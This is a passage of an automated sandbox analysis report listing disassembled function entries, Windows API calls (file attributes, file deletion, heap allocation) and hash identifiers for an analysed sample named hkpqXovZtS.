                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemText_swprintf_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2444572147-0
                                                                                                                • Opcode ID: 1987c9497c4c2ec1e82adad3159d1d02946cef441ef0d6fe948741306ed1f94d
                                                                                                                • Instruction ID: 6eadc209e9c1c49b6d8139f6daa10ac0a14171367b877a8bca27eb2da8358c34
                                                                                                                • Opcode Fuzzy Hash: 1987c9497c4c2ec1e82adad3159d1d02946cef441ef0d6fe948741306ed1f94d
                                                                                                                • Instruction Fuzzy Hash: 7AF0FC71500308B5EB10E7A0CC86F9A3B6C9B04744F0500BAB204B50D1DA759A95CBA9
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,771B20B0,00000000,004084FA,?,00406E86,?,00000000,?,00000800,?,?,?,?,?,00000000), ref: 004089A8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: lB
                                                                                                                • API String ID: 2962429428-323450203
                                                                                                                • Opcode ID: ba7a975211f5a9e7d3bc834a54581ac86f47199770ad2771ff7e8f6f2bb1967d
                                                                                                                • Instruction ID: aa1bb7b18bb7cf047748d38db68985a3d69a47c67909f6350a8d97187e2b0de3
                                                                                                                • Opcode Fuzzy Hash: ba7a975211f5a9e7d3bc834a54581ac86f47199770ad2771ff7e8f6f2bb1967d
                                                                                                                • Instruction Fuzzy Hash: D6F0E2B05427104BD33076B847483B337D89B12331F08872FD4E2A32D1DB7DA8494B5A
                                                                                                                APIs
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,771B3110,?,?,0040927F,?,?,?,00406E31,?,?,?), ref: 00408FFF
                                                                                                                  • Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
                                                                                                                  • Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
                                                                                                                  • Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0040927F,?,?,?,00406E31,?,?,?), ref: 0040902C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile$_wcscpy_wcslen_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1770613603-0
                                                                                                                • Opcode ID: a879b4608ec852c8fb212142d05917fb69a815091193c39ae2d413685fc7b376
                                                                                                                • Instruction ID: bea34a86155dea3f025df7f3e2fa713b727de01319cb637a94e51e388e902359
                                                                                                                • Opcode Fuzzy Hash: a879b4608ec852c8fb212142d05917fb69a815091193c39ae2d413685fc7b376
                                                                                                                • Instruction Fuzzy Hash: FFF0A031141229BADF11AA60DC01FDA3B5CAF043D4F488023BC84A7190DB75DE95EAA4
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,-00000009,00000000,?,0040870C,?,?,00000001,?,?,?,?,?,?,00406E86,?), ref: 00409053
                                                                                                                  • Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
                                                                                                                  • Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
                                                                                                                  • Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000800,?,0040870C,?,?,00000001,?,?,?,?,?,?,00406E86), ref: 0040907D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile$_wcscpy_wcslen_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1811046493-0
                                                                                                                • Opcode ID: bcbe461a772df30d986d2132bbb3efae58862733e45b31bb938c371bed5dd360
                                                                                                                • Instruction ID: 2842e0246cb0c92567f7b58113ba661988c26c59797c62abd3e8f5ab0e2f46a2
                                                                                                                • Opcode Fuzzy Hash: bcbe461a772df30d986d2132bbb3efae58862733e45b31bb938c371bed5dd360
                                                                                                                • Instruction Fuzzy Hash: B2E0223124122AA6DB10AB60CC01FDB3B9CAF043D5F084073BD84A31E1DB74DD94DAB4
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,771B3110,?,00409205,?,00409247,?,?,00406E31,?,?,?), ref: 00408FB0
                                                                                                                  • Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
                                                                                                                  • Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
                                                                                                                  • Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,00409205,?,00409247,?,?,00406E31,?,?,?), ref: 00408FD8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile$_wcscpy_wcslen_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1770613603-0
                                                                                                                • Opcode ID: e9d98861f01fd9d19c00489613874ebf97a6b2f5bd18fcf808d3d81f8ebab78d
                                                                                                                • Instruction ID: e8fbbc9c55ef58848b20d7b58562d5d9a2c3566e41e168d69c76d702a677ee75
                                                                                                                • Opcode Fuzzy Hash: e9d98861f01fd9d19c00489613874ebf97a6b2f5bd18fcf808d3d81f8ebab78d
                                                                                                                • Instruction Fuzzy Hash: AEE09B326002182ACF10A669DC00BDB379E9B883A5F040177F644E32D0DBB4DD85CBE4
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00000000,004349D8,0040FD5A), ref: 00419373
                                                                                                                • FreeLibrary.KERNEL32(?,00000000,004349D8,0040FD5A), ref: 0041937D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 87cc2e9fa7f807a3b307f0e1411869635d4d8fb71b69247945e2787b503a5221
                                                                                                                • Instruction ID: 4deb4dc1eba71034df55e9c1270a6008095a78b74773f60a8cff26fbadc79a94
                                                                                                                • Opcode Fuzzy Hash: 87cc2e9fa7f807a3b307f0e1411869635d4d8fb71b69247945e2787b503a5221
                                                                                                                • Instruction Fuzzy Hash: 0EE0EC357016249B8724DB69DC0498AF3ACAF99B21316046AE819E3260C774EC42CEA8
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3351165006-0
                                                                                                                • Opcode ID: 1c172d71844c4af62843ecbcaddec7adf4f269459f05f4589533bf47ca82abe2
                                                                                                                • Instruction ID: 636c1db902bbace9bc44299634c3d1d0cf8dedf33613c34b19b0ab6c256b7f2c
                                                                                                                • Opcode Fuzzy Hash: 1c172d71844c4af62843ecbcaddec7adf4f269459f05f4589533bf47ca82abe2
                                                                                                                • Instruction Fuzzy Hash: F2C01272258101FECB011F70EC09C2A7BA89BD4211F15C954B0A9C0060C238C010DB25
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9378db31d0e77431aec107a267e01e0143a0bbd0a431125cdcb333837633e23a
                                                                                                                • Instruction ID: 8b913672f5ef7adeebd12494a0165e36b41289a5b00c19f4be9a645052ee5250
                                                                                                                • Opcode Fuzzy Hash: 9378db31d0e77431aec107a267e01e0143a0bbd0a431125cdcb333837633e23a
                                                                                                                • Instruction Fuzzy Hash: 5EC11971A08215AFCB1ADF48C99099EF3F5BFC8B08F10881EE588D7245E770AD15DB96
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3456c4c149cfddc1b8055f145b0cfa7c03715a28baa2b91cb0fb22c0a44730fb
                                                                                                                • Instruction ID: 6c91a6995b6bb8cc3dde157e4eac339e28c64846cc40dc66bac51218e07dfa72
                                                                                                                • Opcode Fuzzy Hash: 3456c4c149cfddc1b8055f145b0cfa7c03715a28baa2b91cb0fb22c0a44730fb
                                                                                                                • Instruction Fuzzy Hash: C4511B71A08215AFCB0ADF48D99095EF3F5FFC8B08F10881DE689D7245D730A905DB96
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1735881322-0
                                                                                                                • Opcode ID: 4ef09c175604b915a0f324d95a047c37d4305c38759195144dd76dd018e855cf
                                                                                                                • Instruction ID: 851c4021d88b77b2391399c16b3f111d51d0d509961a3bf2f544ad5092f2c5c1
                                                                                                                • Opcode Fuzzy Hash: 4ef09c175604b915a0f324d95a047c37d4305c38759195144dd76dd018e855cf
                                                                                                                • Instruction Fuzzy Hash: 292192716412186ADF209F65C941BDA73A8AF16704F00846BF945BB2C2D2789E84CB98
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004016CE: __EH_prolog.LIBCMT ref: 004016D3
                                                                                                                • _malloc.LIBCMT ref: 0040F1AF
                                                                                                                  • Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
                                                                                                                  • Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
                                                                                                                  • Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateH_prologHeap_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3218263244-0
                                                                                                                • Opcode ID: b1605ace7e7b6f59692fdb9d2c1fcb21a67d47c71e7f1ac774e37c5e784f0e02
                                                                                                                • Instruction ID: 13ecf58393b850d4dcf62f4b090d4bd7f87923e5f9eb74dacda1a2a2b25616ff
                                                                                                                • Opcode Fuzzy Hash: b1605ace7e7b6f59692fdb9d2c1fcb21a67d47c71e7f1ac774e37c5e784f0e02
                                                                                                                • Instruction Fuzzy Hash: 81117432804288CFCB22DBA4C8515EE7BB0AF09314F1400BFC4526B2D2EA7D594ACB24
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-0
                                                                                                                • Opcode ID: aa5e027e605d9c7aa5fc794eba84c6725fdbe8de1aad472a731ad67a540c2c24
                                                                                                                • Instruction ID: 5f29ca8d028dcbf4478a0dccd66fe47fd797d4706ee7f484061b46a6f8bae4d7
                                                                                                                • Opcode Fuzzy Hash: aa5e027e605d9c7aa5fc794eba84c6725fdbe8de1aad472a731ad67a540c2c24
                                                                                                                • Instruction Fuzzy Hash: F3119132D00356A7DB21AE59C885BEF7664AB84728F04423EEC24772C1C77CAD50E6DE
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00401788: __EH_prolog.LIBCMT ref: 0040178D
                                                                                                                  • Part of subcall function 00401788: _memset.LIBCMT ref: 004018D3
                                                                                                                  • Part of subcall function 00401788: _memset.LIBCMT ref: 004018E2
                                                                                                                  • Part of subcall function 00401788: _memset.LIBCMT ref: 004018F1
                                                                                                                  • Part of subcall function 004016CE: __EH_prolog.LIBCMT ref: 004016D3
                                                                                                                • _malloc.LIBCMT ref: 0040F1AF
                                                                                                                  • Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
                                                                                                                  • Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
                                                                                                                  • Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog$AllocateHeap_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4222972222-0
                                                                                                                • Opcode ID: 238b6014e27b17abf2400218ffa1caa5fe559d75f281bd02877e9b1c6b73aa66
                                                                                                                • Instruction ID: 21d0035833bb4e516a42c3fe1892bcdba2466c9154d59b7260265a3ac8994e5a
                                                                                                                • Opcode Fuzzy Hash: 238b6014e27b17abf2400218ffa1caa5fe559d75f281bd02877e9b1c6b73aa66
                                                                                                                • Instruction Fuzzy Hash: 59117C72800249DBCF11DFA5C8819EEB7B4BF18308F14047FE40A77291EB395A49CB65
                                                                                                                APIs
                                                                                                                  • Part of subcall function 022A79D8: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 022A7A19
                                                                                                                • _free.LIBCMT ref: 022ACAA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 614378929-0
                                                                                                                • Opcode ID: 74ec985b845149d2fb39c7ff511b9964ee0716ab4dfd8355de6e1a843b65cb50
                                                                                                                • Instruction ID: f97b1755f762605ce1bb8b91158d08b496b7c0074613099ec16198ddd1454504
                                                                                                                • Opcode Fuzzy Hash: 74ec985b845149d2fb39c7ff511b9964ee0716ab4dfd8355de6e1a843b65cb50
                                                                                                                • Instruction Fuzzy Hash: 3C014972610317AFC320CFA8C89499DFB98FB057B0F04022AE556A7AC0E3706911CBA4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004016CE: __EH_prolog.LIBCMT ref: 004016D3
                                                                                                                • _malloc.LIBCMT ref: 0040F1AF
                                                                                                                  • Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
                                                                                                                  • Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
                                                                                                                  • Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateH_prologHeap_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3218263244-0
                                                                                                                • Opcode ID: ca89fc0f26018b19baf3706dbfef26bfe5d5f2317c3fc148892d5a9d1a6ad13d
                                                                                                                • Instruction ID: 0f7d4ec6ecad36ae556b8e39718a27ffd0918a8d9bbd7808b8bf1204012fa6c0
                                                                                                                • Opcode Fuzzy Hash: ca89fc0f26018b19baf3706dbfef26bfe5d5f2317c3fc148892d5a9d1a6ad13d
                                                                                                                • Instruction Fuzzy Hash: 20112132844249CFCB21DB90C8505EDBBB0AB19320F14057FC4667B7D1EA3D8E8ACB58
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
